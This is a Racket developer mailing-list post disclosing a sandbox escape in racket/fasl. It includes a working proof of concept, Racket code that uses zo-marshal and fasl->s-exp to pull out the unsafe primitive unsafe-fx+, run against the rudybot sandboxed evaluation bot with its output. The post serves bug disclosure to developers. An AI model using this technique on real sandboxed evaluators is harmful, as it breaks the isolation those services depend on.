[racket-dev] racket/fasl allows sandbox escape

From: Sam Tobin-Hochstadt (samth at cs.indiana.edu)
Date: Wed Jul 9 09:39:50 EDT 2014

The following exchange with rudybot, which is running the programs in
a sandbox, demonstrates the issue:

09:35 <samth> rudybot: eval (let () (local-require compiler/zo-marshal
compiler/zo-structs racket/fasl) (fasl->s-exp (zo-marshal
(compilation-top 3 (prefix 0 '() '()) (let-void 1 #t (install-value 1
0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
09:35 <rudybot> samth: ; Value: #<procedure:unsafe-fx+>
09:36 <samth> rudybot: eval ((let () (local-require
compiler/zo-marshal compiler/zo-structs racket/fasl) (fasl->s-exp
(zo-marshal (compilation-top 3 (prefix 0 '() '()) (let-void 1 #t
(install-value 1 0 #t (primval 1140) (localref #t 0 #f #f #f )))))))
vector-ref vector-ref)
09:36 <rudybot> samth: ; Value: 32681168

The relevant program is:

(let ()
  (local-require compiler/zo-marshal compiler/zo-structs racket/fasl)
  ;; In the rudybot session above, this evaluates to #<procedure:unsafe-fx+>.
  (fasl->s-exp
   (zo-marshal
    (compilation-top 3
                     (prefix 0 '() '())
                     (let-void 1 #t
                       (install-value 1 0 #t
                                      (primval 1140)
                                      (localref #t 0 #f #f #f)))))))

Sam

Posted on the dev mailing list.